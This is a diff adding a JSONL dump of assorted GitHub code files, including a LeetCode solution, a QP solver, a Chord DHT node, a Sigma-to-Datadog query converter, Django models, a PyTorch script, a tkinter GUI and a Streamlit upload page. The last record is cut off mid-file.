diff --git "a/3889.jsonl" "b/3889.jsonl" new file mode 100644--- /dev/null +++ "b/3889.jsonl" @@ -0,0 +1,1259 @@ +{"seq_id":"20822683872","text":"'''''''''''''''''''''''''''''''''''''''''''''''''''\n > System:\t\tUbuntu\n > Author:\t\tty-l6\n > Mail:\t\tliuty196888@gmail.com\n > File Name:\t\tlongest_common_prefix.py\n > Created Time:\t2017-08-15 Tue 22:13\n'''''''''''''''''''''''''''''''''''''''''''''''''''\n\nclass Solution:\n def longestCommonPrefix(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: str\n \"\"\"\n if not strs: return \"\"\n col_len = min(len(str) for str in strs)\n\n result = 0\n for i in range(col_len):\n if 1 != len(set(s[i] for s in strs)):\n return strs[0][:result]\n else: result += 1\n return strs[0][:result]\n\nif __name__ == '__main__':\n solution = Solution()\n import pprint\n pprint.pprint(solution.longestCommonPrefix(['a']))\n","repo_name":"ltltlt/leetcode","sub_path":"python/longest_common_prefix.py","file_name":"longest_common_prefix.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8366437215","text":"\"\"\"Drop-in replacement for quadprog package.\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef solve_qp(hessian, weights, coeffs, constants, num_eq, rho=0.1, max_iter=10000, tol_x=1e-8, verbose=False):\n\t\"\"\"\n\tSolves a quadratic program\n\tmin 0.5 * x.T.dot(hessian).dot(x) - weights.dot(x)\n\ts.t. coeffs.T.dot(x) = constants, for first num_eq entries\n\tthen coeffs.T.dot(x) >= constants\n\n\tSolves using a dual gradient descent on the augmented Lagrangian with a\n\tprimal-dual gradient ascent-descent, with adagrad for descent\n\n\t:param hessian: n by n matrix\n\t:type hessian: ndarray of shape (n, n)\n\t:param weights: length-n vector\n\t:type weights: ndarray of shape (n,)\n\t:param coeffs: constraint coefficients\n\t:type coeffs: ndarray of shape (n, num_constraints)\n\t:param constants: contraint constants\n\t:type constants: ndarray of shape (num_constraints,)\n\t:param num_eq: number of equality constraints\n\t:type num_eq: int\n\t:param rho: augmented Lagrangian scalar (step size)\n\t:type rho: float\n\t:param max_iter: maximum iterations of ascent-descent\n\t:type max_iter: int\n\t:param tol_x: convergence tolerance for change in primal and dual variables. 
Exits if\n\tchange is less than tol_x\n\t:type tol_x: float\n\t:param verbose: flag to print diagnostic information and plot objective\n\t:type verbose: boolean\n\t:return: tuple containing (0) the solution, (1) the objective value, and (2) the Lagrange variables\n\t:rtype: tuple of length 3\n\t\"\"\"\n\tnum_constraints = constants.size\n\n\tx = np.zeros(weights.size)\n\tgamma = np.zeros(num_constraints)\n\n\tgrad_sum = 1\n\n\tif verbose:\n\t\tobjectives = []\n\n\tfor t in range(max_iter):\n\t\t# save old parameters\n\t\told_x = x.copy()\n\t\told_gamma = gamma.copy()\n\n\t\tobjective = 0.5 * x.dot(hessian).dot(x) - weights.dot(x)\n\t\tviolations = coeffs.T.dot(x) - constants\n\t\tclipped_violations = violations.copy()\n\t\tclipped_violations[num_eq:] = np.clip(violations[num_eq:], a_min=None, a_max=0)\n\n\t\tlinear_lagrange = gamma.dot(violations)\n\t\taugmented_term = 0.5 * rho * clipped_violations.dot(clipped_violations)\n\n\t\tif verbose:\n\t\t\taugmented_lagrangian = objective + linear_lagrange + augmented_term\n\n\t\tviolations = clipped_violations != 0\n\n\t\t# update x\n\n\t\tgrad_x = hessian.dot(x) - weights + gamma.dot(coeffs.T) \\\n\t\t\t+ rho * coeffs[:, violations].dot(coeffs[:, violations].T).dot(x) \\\n\t\t\t- rho * constants[violations].dot(coeffs[:, violations].T)\n\n\t\trate = 1\n\n\t\tgrad_sum += grad_x ** 2\n\n\t\tx -= rate * grad_x / np.sqrt(grad_sum)\n\n\t\t# update gamma\n\t\tviolations = coeffs.T.dot(x) - constants\n\t\tgamma += rho * violations\n\t\tgamma[num_eq:] = np.clip(gamma[num_eq:], a_min=None, a_max=0)\n\n\t\tif verbose:\n\t\t\tobjectives.append(augmented_lagrangian)\n\t\t\tprint(\"t = %d, f(x) = %e, ||x|| = %e, ||df/dx|| = %e, violation = %e\" %\n\t\t\t\t (t, augmented_lagrangian, np.linalg.norm(x), np.linalg.norm(grad_x), np.linalg.norm(clipped_violations)))\n\n\t\tif np.linalg.norm(gamma - old_gamma) + np.linalg.norm(x - old_x) < tol_x:\n\t\t\tbreak\n\n\tif verbose:\n\t\tplt.plot(objectives)\n\t\tplt.show()\n\n\treturn x, objective, gamma\n","repo_name":"berty38/al_quadprog","sub_path":"my_quadprog.py","file_name":"my_quadprog.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"2787955660","text":"from argparse import ArgumentParser\nfrom threading import Thread\nfrom xmlrpc.client import ServerProxy\nfrom xmlrpc.server import SimpleXMLRPCServer\n\nM = 5\nPORT = 1234\nRING = [2, 7, 11, 17, 22, 27]\n\n\nclass Node:\n def __init__(self, node_id):\n \"\"\"Initializes the node properties and constructs the finger table according to the Chord formula\"\"\"\n self.finger_table = []\n self.node_id = node_id\n self.finger_table = [Node.finger_table_successor((node_id + (2**i))% (2**M)) for i in range(M)]\n self.data = {}\n self.successor = RING[(RING.index(node_id) + 1) % len(RING)]\n print(f\"Node created! 
Finger table = {self.finger_table}\")\n\n @classmethod\n def finger_table_successor(cls, id):\n ans = -1\n for val in RING:\n if val >= id:\n ans = val\n break\n if ans == -1:\n return min(RING)\n return ans\n \n\n\n def closest_preceding_node(self, id):\n \"\"\"Returns node_id of the closest preceeding node (from n.finger_table) for a given id\"\"\"\n for val in reversed(self.finger_table):\n if self.node_id < id:\n for i in range(self.node_id + 1, id):\n if i == val:\n return val\n else:\n for i in range(self.node_id + 1, 2 ** M):\n if i == val:\n return val\n for i in range(1, id):\n if i == val:\n return val\n return self.node_id\n\n def find_successor(self, id):\n \"\"\"Recursive function returning the identifier of the node responsible for a given id\"\"\"\n if id == self.node_id:\n return id\n \n if id > self.node_id and id <= self.successor or (id < self.node_id and id <= self.successor):\n return self.successor\n\n n = self.closest_preceding_node(id)\n\n if n == self.node_id:\n return self.node_id\n \n nextNode = ServerProxy(f'http://node_{n}:{PORT}')\n print(f\"Forwarding request (key={id}) to node {n}\")\n return nextNode.find_successor(id)\n\n def put(self, key, value):\n \"\"\"Stores the given key-value pair in the node responsible for it\"\"\"\n print(f\"put({key}, {value})\")\n if key >= 2 ** M or key < 0:\n return False\n nextNode = self.find_successor(key)\n if nextNode == self.node_id: \n return self.store_item(key, value)\n else:\n proxy = ServerProxy(f'http://node_{nextNode}:{PORT}')\n return proxy.store_item(key, value)\n\n def get(self, key):\n \"\"\"Gets the value for a given key from the node responsible for it\"\"\"\n print(f\"get({key})\")\n n = self.find_successor(key)\n if n == self.node_id:\n return self.retrieve_item(key)\n node = ServerProxy(f'http://node_{n}:{PORT}')\n return node.retrieve_item(key)\n\n def store_item(self, key, value):\n \"\"\"Stores a key-value pair into the data store of this node\"\"\"\n self.data[key] = value\n return True\n\n def retrieve_item(self, key):\n \"\"\"Retrieves a value for a given key from the data store of this node\"\"\"\n ans = self.data.get(key)\n if ans is None:\n return -1\n return ans\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('node_id', type = int)\n args = parser.parse_args()\n node = Node(args.node_id)\n server = SimpleXMLRPCServer((f\"node_{args.node_id}\", PORT), logRequests = False)\n server.register_instance(node)\n server.serve_forever()\n","repo_name":"Ejedavy/distributed_Hash_Table_ChordAlgo","sub_path":"node_DavidEje.py","file_name":"node_DavidEje.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6282402761","text":"from re import compile\nfrom sigma.backends.base import SingleTextQueryBackend\nfrom sigma.parser.condition import NodeSubexpression\n\n\nclass DatadogLogsBackend(SingleTextQueryBackend):\n \"\"\"Converts Sigma rule into Datadog log search query.\"\"\"\n\n identifier = \"datadog-logs\"\n active = True\n config_required = False\n\n andToken = \" AND \"\n orToken = \" OR \"\n notToken = \"-\"\n subExpression = \"(%s)\"\n listExpression = \"(%s)\"\n # List selection items are linked with a logical 'OR' per the Sigma specification:\n # https://github.com/SigmaHQ/sigma/wiki/Specification#lists.\n listSeparator = \" OR \"\n valueExpression = \"%s\"\n mapExpression = \"%s:%s\"\n nullExpression = \"-%s:*\"\n notNullExpression = \"%s:*\"\n\n # The escaped 
characters list comes from https://docs.datadoghq.com/logs/explorer/search_syntax/#escaping-of-special-characters.\n specialCharactersRegexp = compile(r'([+\\-=&|>\", val)\n )\n\n def generateMapItemNode(self, node):\n key, value = node\n return super().generateMapItemNode(((self.wrap_key(key)), value))\n\n def generateNULLValueNode(self, node):\n return super().generateNULLValueNode((self.wrap_key(node)))\n\n def generateNotNULLValueNode(self, node):\n return super().generateNotNULLValueNode(self.wrap_key(node))\n\n def wrap_key(self, key):\n if key not in self.tags and key not in ['index', 'service', 'source', 'env']:\n # print(\"WARNING tag %s not converted\" % format(key))\n return \"@%s\" % key\n elif key not in ['index', 'service', 'source', 'env']:\n return self.tags[key]\n else:\n return key\n","repo_name":"krdmnbrk/play-with-splunk","sub_path":"SUIT/SigmaApp/packages/sigma-app/src/main/resources/splunk/bin/sigma/sigma/backends/datadog.py","file_name":"datadog.py","file_ext":"py","file_size_in_byte":4355,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"37212539324","text":"from django.db import models\nfrom apps.bases.models import ClaseModelo\nfrom apps.empresas.models import Empresa\n\nclass Proveedor(ClaseModelo): \n descripcion=models.CharField(\n max_length=100,\n unique=True\n )\n direccion=models.CharField(\n max_length=250,\n null=True, blank=True\n )\n contacto=models.CharField(\n max_length=100\n )\n telefono=models.CharField(\n max_length=10,\n null=True, blank=True\n )\n email=models.CharField(\n max_length=250,\n null=True, blank=True\n )\n\n def __str__(self):\n return '{}'.format(self.descripcion)\n\n def save(self):\n self.descripcion = self.descripcion.upper()\n super(Proveedor, self).save()\n\n class Meta:\n verbose_name_plural = \"Proveedores\"\n\nclass Productos(ClaseModelo): \n codigo = models.CharField(\n max_length=20,\n unique=True\n )\n \n descripcion = models.CharField(\n max_length=50, \n unique=True, \n blank=False,\n verbose_name=\"Descripción Producto\"\n ) \n\n precio=models.FloatField( \n #max_digits=8,\n #decimal_places=2,\n default=0,\n blank=True,\n verbose_name=\"Precio\"\n ) \n\n def __str__ (self):\n return '{}'.format(self.descripcion) \n \n def save(self):\n self.descripcion = self.descripcion.upper() \n super(Productos, self).save()\n\n class Meta:\n verbose_name_plural = \"Productos\" \n\n\nclass ComprasEnc(ClaseModelo):\n id = models.AutoField(\n primary_key=True,\n verbose_name=\"Número Solicitud de Compra\" \n )\n\n pk_empresa = models.ForeignKey(\n Empresa, \n blank=False,\n verbose_name=\"Empresa\",\n on_delete=models.CASCADE\n )\n fecha_solicitud = models.DateField(verbose_name=\"Fecha solicitud\", blank=False) \n #fecha_compra=models.DateField(null=True,blank=True)\n observacion=models.TextField(blank=True,null=True)\n #no_factura=models.CharField(max_length=100)\n #fecha_factura=models.DateField()\n sub_total=models.FloatField(default=0)\n descuento=models.FloatField(default=0)\n total=models.FloatField(default=0)\n\n pk_proveedor = models.ForeignKey(\n Proveedor, \n blank=False,\n verbose_name=\"Proveedor\",\n on_delete=models.CASCADE\n )\n \n def __str__(self):\n return '{}'.format(self.observacion)\n\n def save(self):\n self.observacion = self.observacion.upper()\n self.total = self.sub_total - self.descuento\n super(ComprasEnc,self).save()\n\n class Meta:\n verbose_name_plural = \"Encabezado Compras\"\n verbose_name=\"Encabezado Compra\"\n\n\n\nclass 
ComprasDet(ClaseModelo):\n compra=models.ForeignKey(ComprasEnc,on_delete=models.CASCADE)\n\n\n pk_productos = models.ManyToManyField(\n Productos, \n blank=True,\n verbose_name=\"Productos\" \n )\n\n #producto=models.ForeignKey(Producto,on_delete=models.CASCADE)\n #cantidad=models.BigIntegerField(default=0)\n\n unidades=models.BigIntegerField( \n default=0,\n blank=True,\n verbose_name=\"Unidades\"\n )\n pk_precio = Productos().precio\n #precio_prv=models.FloatField(default=0)\n importe=models.FloatField( \n #max_digits=8,\n #decimal_places=2,\n default=0,\n blank=True,\n verbose_name=\"Importe\"\n ) \n\n #sub_total=models.FloatField(default=0)\n descuento=models.FloatField(default=0)\n total=models.FloatField(default=0)\n costo=models.FloatField(default=0)\n\n def __str__(self):\n return '{}'.format(self.producto)\n\n def save(self):\n self.importe = float(float(int(self.unidades)) * float(self.pk_precio))\n self.total = self.importe - float(self.descuento)\n super(ComprasDet, self).save()\n \n class Mega:\n verbose_name_plural = \"Detalle Solicitud\"\n verbose_name=\"Detalle Solicitud\"\n\n","repo_name":"JavierGonzalezAlvarez/django_admin_angular","sub_path":"back/apps/solicitud/templates/sol/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73054461353","text":"import torch\nfrom torch import nn\nfrom torch.nn import init\nimport torchvision\nimport torchvision.transforms as transforms\nimport matplotlib.pyplot as plt\nimport utils.d2lzh_pytorch as d2l\nimport numpy as np\nimport sys\nimport time\nfrom collections import OrderedDict\n\nbatch_size = 256\ntrain_iter, test_iter = d2l.load_data_fashion_mnist(batch_size)\n\nnum_inputs = 784\nnum_outputs = 10\n\n\n# 转换 样本中(batch_size, 28, 28)数据为 (batch_size,784)\n\nclass FlattenLayer(nn.Module):\n def __init__(self):\n super(FlattenLayer, self).__init__()\n\n def forward(self, x):\n return x.view(x.shape[0], -1)\n\n\n# 定义模型\nclass LinearNet(nn.Module):\n def __init__(self, num_inputs, num_outputs):\n super(LinearNet, self).__init__()\n self.linear = nn.Linear(num_inputs, num_outputs)\n\n def forward(self, x):\n y = self.linear(x.view(x.shape[0], -1)) # x torch.size([256, 1, 28, 28]) 256个展开, 压平 卷积 到全连接 =》一维\n return y\n\n\nnet = LinearNet(num_inputs, num_outputs).cuda()\n\nnet = nn.Sequential(\n OrderedDict([\n ('flatten', FlattenLayer()),\n ('linear', nn.Linear(num_inputs, num_outputs))\n ])\n)\n# 初始化模型权重\ninit.normal_(net.linear.weight, mean=0, std=0.01)\ninit.constant_(net.linear.bias, val=0)\n\n# 定义损失函数 、 优化器\nloss = nn.CrossEntropyLoss()\n\noptimizer = torch.optim.SGD(net.parameters(), lr=0.1)\n\nstart = time.time()\n\nnum_epochs = 5\nd2l.train_ch3(net, train_iter, test_iter, loss, num_epochs, batch_size, None, None, optimizer)\n\n# 封装一个 通用的 cuda 训练函数 取代d2l.train_ch3\n\n\nprint('%.2f sec' % (time.time() - start))\nprint(\"done!\")\n","repo_name":"BenjaminChiu/MyPytorch","sub_path":"DIDL/3.7_Softmax.py","file_name":"3.7_Softmax.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35860026155","text":"WELCOME_TEXT = \"Hi there!👋\\nSeems someone does not know where to go?🤠\\niDi is here for you!\"\n\nRETURN = \"↩ Return\"\nMAIN_MENU = \"Main menu:\"\n\nCAFE = \"🍵 Café/Restaurants\"\nPLACES = \"��️ Places\"\nEVENTS = \"🪩 Events\"\nADD_EVENT = \"📝 Add Event\"\n\nLIKE = \"👍 Like\"\nDISLIKE = \"👎 
Dislike\"\n\nOPTION_BELOW = \"Choose one of the options below 👇\"\nREGISTER_BUTTON = \"Register 👤\"\nREGISTER = \"First register please 👇\"\nREGISTER_SUCCESS = \"You have been registered successfully ✅\"\nREGISTERED_ALREADY = 'You have already registered ✅'\n\nAGE = \"What is your age?\"\nAGE_AGAIN = \"Please write your age correctly 👇\"\nGENDER = \"What is your gender?\"\nGENDER_AGAIN = \"Please choose your gender correctly 👇\"\nMALE = \"👨 Male\"\nFEMALE = \"👩 Female\"\n\nBOT_STARTED = \"Admin, bot has been launched 🤖\"\nLOCATION = \"Send your current location 👇\"\nLOCATION_BUTTON = \"Send my location\"\n\n\n","repo_name":"shkhryr/swt-idi","sub_path":"src/utils/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18814902846","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom modules import database_module\nfrom datetime import datetime\n\nclass GUI:\n fecha_actual = datetime.now()\n fecha = fecha_actual.strftime('%d-%m-%Y')\n hora = fecha_actual.strftime('%H:%M')\n\n def __init__(self,root):\n self.root = root\n self.root.title('Registro declaraciones de salud')\n self.database = database_module.Database()\n #Primer bloque: marco informativo\n #Frame\n self.frame_contador = tk.LabelFrame(self.root, text='Información',font=('Courier',16))\n self.frame_contador.pack(anchor='nw', fill='x',pady=10)\n #txt\n self.label_texto = tk.Label(self.frame_contador,text=\"Declaraciones de salud\", font=('Courier',20))\n self.label_texto.pack(anchor='nw', fill='x')\n #txt_fecha\n self.label_fecha = tk.Label(self.frame_contador,text=f\"Fecha: {self.fecha}\", font=('Courier',18)) \n self.label_fecha.pack(anchor='nw', fill='x')\n #propiedad de conteo_diario\n conteo = self.conteoDiario()\n #txt_conteo\n self.label_conteo = tk.Label(self.frame_contador, text=f\"Llevas {conteo}\",font=('Courier',18))\n self.label_conteo.pack(anchor='nw', fill='x')\n #Segundo bloque: botones\n #frame\n self.frame_bloque_2 = tk.LabelFrame(self.root,text=\"Has click en la opción que quieres seleccionar:\")\n self.frame_bloque_2.pack(anchor='nw',fill='x',pady=10)\n #btn agregar ds\n self.boton_agregar_ds = tk.Button(self.frame_bloque_2, text='Agregar declaración\\nde salud', command=self.agregarDs)\n self.boton_agregar_ds.pack(anchor='nw', fill='x')\n #btn actualizar conteo\n self.boton_actualizar = tk.Button(self.frame_bloque_2, text='Actualizar conteo', command=self.actualizar_conteo)\n self.boton_actualizar.pack(anchor='nw', fill='x')\n #btn abrir ventana registros\n self.boton_registros = tk.Button(self.frame_bloque_2, text='Abrir registros', command=self.Crear_ventana_registro)\n self.boton_registros.pack(anchor='nw', fill='x')\n #btn descargar registros\n self.boton_descargar = tk.Button(self.frame_bloque_2, text='Descargar registros', command=self.descargarRegistros)\n self.boton_descargar.pack(anchor='nw', fill='x')\n #Tercer bloque: Respuesta\n #frame\n self.frame_respuesta = tk.LabelFrame(self.root,text='Respuesta:')\n self.frame_respuesta.pack(anchor='nw', fill='x')\n #txt_respuesta\n self.texto_respuesta = tk.Label(self.frame_respuesta,text='Esperando...')\n self.texto_respuesta.pack(anchor='nw', fill='x',pady=10)\n\n def Crear_ventana_registro(self):\n v_registro = tk.Toplevel(self.root)\n v_registro.title('Registro de declaraciones de salud')\n\n #Marco de botones\n frame_registro = tk.LabelFrame(v_registro)\n frame_registro.pack(anchor='nw', fill='x')\n\n #bloque de 
botones para editar,actualizar y eliminar registros\n boton_actualizar = tk.Button(frame_registro,text=\"Actualizar registro\",command=lambda: self.ActualizarRegistro(mensaje_respuesta))\n boton_actualizar.grid(row=0,column=0)\n \n boton_eliminar = tk.Button(frame_registro,text=\"Eliminar registro\",command=lambda: self.EliminarRegistro(mensaje_respuesta))\n boton_eliminar.grid(row=0,column=1)\n\n mensaje_respuesta = tk.Label(frame_registro,text='',fg='red')\n mensaje_respuesta.grid(row=1,column=0)\n\n #tabla de registros\n self.tree = ttk.Treeview(v_registro, height=10, columns=2)\n self.tree.pack()\n self.tree.heading('#0', text='fecha',anchor='center')\n self.tree.heading('#1', text='hora',anchor='center')\n\n self.ObtenerRegistros()\n\n def actualizar_conteo(self):\n conteo = self.conteoDiario()\n self.label_conteo.config(text=f\"Llevas {conteo}\")\n self.texto_respuesta.config(text='\\nSe ha actualizado con éxito el conteo\\n')\n\n def agregarDs(self):\n self.database.agregarDs()\n self.texto_respuesta.config(text='Se agrego con exito.\\nRecuerda actualizar el conteo.')\n \n def conteoDiario(self):\n return self.database.conteo_diario()\n \n def descargarRegistros(self):\n self.database.descargar_registros()\n self.texto_respuesta.config(text='Se descargo el registro de declaraciones\\nde salud exitosamente.')\n \n def ActualizarRegistro(self, mensaje_respuesta):\n self.ObtenerRegistros()\n mensaje_respuesta.config(text='Se actualizó el registro') \n \n def ObtenerRegistros(self):\n records = self.tree.get_children()\n for element in records:\n self.tree.delete(element)\n db_rows = self.database.Obtener_registros()\n for row in db_rows:\n self.tree.insert('', 0, text = row[1], values = row[2])\n \n def EliminarRegistro(self,mensaje_respuesta):\n mensaje_respuesta.config(text='')\n try:\n self.tree.item(self.tree.selection())['text'][0]\n except IndexError as e:\n mensaje_respuesta.config(text='Selecciona un registro')\n return\n mensaje_respuesta.config(text='')\n fecha = self.tree.item(self.tree.selection())['text']\n hora = self.tree.item(self.tree.selection())['values'][0]\n self.database.Eliminar_registro(fecha,hora)\n mensaje_respuesta.config(text='Registro {} eliminado'.format(fecha)) \n self.ObtenerRegistros()","repo_name":"Gesh714/contador_ds","sub_path":"modules/gui_module.py","file_name":"gui_module.py","file_ext":"py","file_size_in_byte":5558,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29670750238","text":"#range函数\n\n#使用迭代器模拟range函数\n\nclass IterRange(object):\n '''使用迭代器模拟range函数'''\n\n def __init__(self, start, end, interval=1):\n \"\"\"\n 初始化传入的参数\n :param start: 开始数字 type: int\n :param end: 结束数字 type: int\n \"\"\"\n self.start = start - 1\n self.end = end\n self.interval = interval\n\n def __next__(self):\n '''每执行一次start + 1'''\n self.start += self.interval\n if self.start >= self.end:\n raise StopIteration\n return self.start\n\n def __iter__(self):\n '''设置为其可迭代'''\n return self\n\n\n#使用生成器模拟range函数\n\nclass GenRange(object):\n '''使用生成器模拟range函数'''\n\n def __init__(self, start, end, interval=1):\n self.start = start\n self.end = end\n self.interval = interval\n\n def get_num(self):\n '''使用rield获取数字'''\n while True:\n if self.start == self.end:\n break\n self.start += self.interval\n yield self.start - 1\n\n\nif __name__ == '__main__':\n iterrange = IterRange(1, 6)\n result = list(iterrange)\n print(result)\n print('*' * 30)\n genrange = GenRange(1, 6)\n resu = genrange.get_num()\n li = list(resu)\n 
print(li)","repo_name":"zhanghui0228/study","sub_path":"python_Basics/class/Decorator/range.py","file_name":"range.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74387986791","text":"import streamlit as st \r\nimport pandas as pd\r\nimport chardet\r\n\r\nfrom Data_transformation import *\r\n\r\ndef app(state):\r\n\tst.title('Upload your data')\r\n\tst.write('Click the button below to add your dataset and check if your data is correct')\r\n\tupload = st.file_uploader('',accept_multiple_files = False)\r\n\tplaceholder_data = {'vWMF9pPHn2':'placeholder'}\r\n\tstate.data = pd.DataFrame(placeholder_data, columns = ['vWMF9pPHn2'], index = [0])\r\n\tif upload is not None:\r\n\t\t\tstate.name = upload.name\r\n\t\t\tif state.name.split('.')[1] == 'xlsx' or state.name.split('.')[1] == 'xls' :\r\n\t\t\t\tdata = upload.read()\r\n\t\t\t\texcel = pd.ExcelFile(data)\r\n\t\t\t\tsheet = st.selectbox('Sheet from excel file to be used',excel.sheet_names)\r\n\t\t\t\t\r\n\t\t\t\t#options for excel upload\r\n\t\t\t\tif st.checkbox('More options', value = False):\r\n\t\t\t\t\tstate.data = pd.read_excel(data, sheet_name = sheet)\r\n\t\t\t\t\ttotal = len(state.data)\r\n\t\t\t\t\tif st.checkbox('Select first and last row of the dataset'):\r\n\t\t\t\t\t\tskip = st.number_input('Beginning of the dataset', value = 1)\r\n\t\t\t\t\t\tlast = st.number_input('End of the dataset', value = total)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tskip = 0\r\n\t\t\t\t\t\tlast = total\r\n\t\t\t\t\tif st.checkbox('Does your data has a Header?', value = True):\r\n\t\t\t\t\t\theader = 0\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\theader = None\r\n\r\n\t\t\t\t\tstate.data = pd.read_excel(data, sheet_name = sheet, skiprows = skip-1, header = header)[0:last]\r\n\t\t\t\t\t#st.write(state.data.head(5))\r\n\t\t\t\telse:\r\n\t\t\t\t\tstate.data = pd.read_excel(data, sheet_name = sheet)\r\n\t\t\t\t\t#st.write(state.data.head(5))\r\n\t\t\t\r\n\t\t\telif state.name.split('.')[1] == 'csv' or state.name.split('.')[1] == 'txt' :\r\n\t\t\t\tresult = chardet.detect(upload.read(100000))\r\n\t\t\t\tsep = st.text_input('What is the field separator ?', value = ',')\r\n\t\t\t\t#options for plain text upload\r\n\t\t\t\tif st.checkbox('More options', value = False):\r\n\t\t\t\t\tif st.checkbox('Select decimal marker'):\r\n\t\t\t\t\t\tdec = st.text_input('Decimal marker', value = ',')\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tdec = ','\r\n\t\t\t\t\tif st.checkbox('Select thousands marker'):\r\n\t\t\t\t\t\tthou = st.text_input('Thousands marker', value = '.')\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tthou = '.'\t\t\t\t\t\r\n\t\t\t\t\tupload.seek(0)\r\n\t\t\t\t\tstate.data = pd.read_csv(upload, sep = sep, encoding = result['encoding'], decimal = dec, thousands = thou)\r\n\t\t\t\t\ttotal = len(state.data)\r\n\t\t\t\t\tif st.checkbox('Select first and last row of the dataset'):\r\n\t\t\t\t\t\tskip = st.number_input('Beginning of the dataset', value = 1)\r\n\t\t\t\t\t\tlast = st.number_input('End of the dataset', value = total)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tskip = 0\r\n\t\t\t\t\t\tlast = total\r\n\t\t\t\t\tif st.checkbox('Does your data has a Header?', value = True):\r\n\t\t\t\t\t\theader = 0\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\theader = None\r\n\t\t\t\t\tupload.seek(0)\r\n\t\t\t\t\t#st.write(pd.read_csv(upload))\r\n\r\n\t\t\t\t\tstate.data = pd.read_csv(upload, skiprows = skip-1, header = header, sep = sep,thousands = thou, encoding = result['encoding'], decimal = 
dec)[0:last]\r\n\t\t\t\t\t#st.write(state.data.head(5))\r\n\t\t\t\telse:\r\n\t\t\t\t\tupload.seek(0)\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tstate.data = pd.read_csv(upload, sep = sep, encoding = result['encoding'])\r\n\t\t\t\t\texcept pd.errors.ParserError:\r\n\t\t\t\t\t\tst.write('Your separator is \"%s\" . It is problably wrong, open your file and check it. If it is ok file an issue. Sorry for the incovenience' %(sep))\r\n\t\t\t\t\t#st.write(state.data.head(5))\r\n\t\r\n\t#show begining of dataset\r\n\tif 'vWMF9pPHn2' not in state.data.columns:\r\n\t\tst.write(state.data.head(5))\r\n\telse:\r\n\t\tst.write('Waiting...')\r\n\r\n\t# Data pre processing\r\n\twith st.beta_expander('Data Pre-Processing'):\r\n\r\n\t\t#deal with missing values\r\n\t\tst.write(\"**If you don't have missing values in your data you can uncheck the box bellow**\" )\r\n\t\tif st.checkbox('Fill empty values', value = True):\r\n\t\t\tcols = []\r\n\t\t\tfor i in state.data.columns:\r\n\t\t\t\tif st.checkbox('%s has missing values to tranform'%(i)):\r\n\t\t\t\t\tcols.append(i)\r\n\t\t\tfor i in cols:\r\n\t\t\t\tmethod = None\r\n\t\t\t\tto_do_na = st.selectbox('Fill %s using:'%(i),('Numbers','Words','Dates','Previous value','Next value'), key = i)\r\n\t\t\t\tif to_do_na == 'Numbers':\r\n\t\t\t\t\tnew_val = st.number_input('Type the number', value = 0, key = i)\r\n\t\t\t\t\tstate.data.fillna({i:new_val}, inplace = True)\r\n\t\t\t\telif to_do_na == 'Words':\r\n\t\t\t\t\tnew_val = st.text_input('Type the word', key = i)\r\n\t\t\t\t\tstate.data.fillna({i:new_val}, inplace = True)\r\n\t\t\t\telif to_do_na == 'Dates':\r\n\t\t\t\t\tnew_val = st.date_input('Select date', key = i)\r\n\t\t\t\t\tstate.data.fillna({i:new_val}, inplace = True)\r\n\t\t\t\telif to_do_na == 'Previous value':\r\n\t\t\t\t\tmethod = 'ffill'\r\n\t\t\t\t\tstate.data[i].fillna(method = method, inplace = True)\r\n\t\t\t\telif to_do_na == 'Next value':\r\n\t\t\t\t\tmethod = 'bfill'\r\n\t\t\t\t\tstate.data[i].fillna(method = method, inplace = True)\r\n\r\n\t\t\t#Change column name\r\n\t\tif st.checkbox('Change column names ?', value = False):\r\n\t\t\tnew_columns = {}\r\n\t\t\tfor col in state.data.columns:\r\n\t\t\t\tnew_columns[col] = st.text_input(\"Column '%s' new name\"%col, value = col)\r\n\t\t\tstate.data = state.data.rename(columns = new_columns)\r\n# Modify dataset\r\n\twith st.beta_expander('Data transformation'):\r\n\r\n\t\tif st.checkbox('Simple mathematical operations'):\r\n\t\t\ttype_of_operations = ['Operation using a single number e.g., column + 4', 'Operation using multiple columns element wise e.g., column 1 + column 2 + column 3']\r\n\t\t\tselection_of_type = st.selectbox('Which type of operation do you want?', type_of_operations)\r\n\t\t\toperations = ['sum','subtraction','division','multiplication','exponent','root','logarithm','Natural logarithm','Cosine','Sine','Tangent']\r\n\t\t\toperation_type = st.selectbox('Select type of operation',operations)\r\n\r\n\t\t\tif type_of_operations[0] == selection_of_type:\r\n\t\t\t\ttransf_col = st.selectbox('select column to be used. 
